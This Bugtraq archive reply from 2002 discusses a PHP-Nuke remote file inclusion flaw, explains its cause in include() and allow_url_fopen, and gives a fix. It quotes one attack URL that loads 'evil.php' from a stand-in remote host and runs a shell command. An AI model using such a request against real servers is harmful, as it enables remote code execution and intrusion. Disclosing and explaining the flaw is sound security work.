Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: PHP-Nuke allows Command Execution & Much more

From: truff <truff () ifrance com>
Date: Mon, 21 Jan 2002 14:43:29 +0100
Hi All!

 I've found a serious security flaw in PHP-Nuke.
 It allows user to execute any PHP code.
 .....
 Then just requesting

http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al


 .......


Hello,

    I used to find this flaw in a lot of _home made_ scripts. This is
due to the use of the include() function with user passed parameters,
and it is not particular to phpnuke. It exists in a lot of scripts cause

the php default config allows to pass http:// and ftp:// parameters to
functions like include().

As it is said in the php manual:

"As long as support for the "URL fopen wrapper" is enabled when you
configure PHP (which it is unless you explicitly
 pass the --disable-url-fopen-wrapper flag to configure (for versions up

to 4.0.3) or set allow_url_fopen to off in
 php.ini (for newer versions)), you can use HTTP and FTP URLs with most
functions that take a filename as a
 parameter, including the require() and include() statements."

Quick Fix:
    Just set allow_url_fopen to off in php.ini .


    - www.projet7.org -  Security Researchs



 
______________________________________________________________________________
ifrance.com, l'email gratuit le plus complet de l'Internet !
vos emails depuis un navigateur, en POP3, sur Minitel, sur le WAP...
http://www.ifrance.com/_reloc/email.emailif
Previous By Date Next
Previous By Thread Next

Current thread: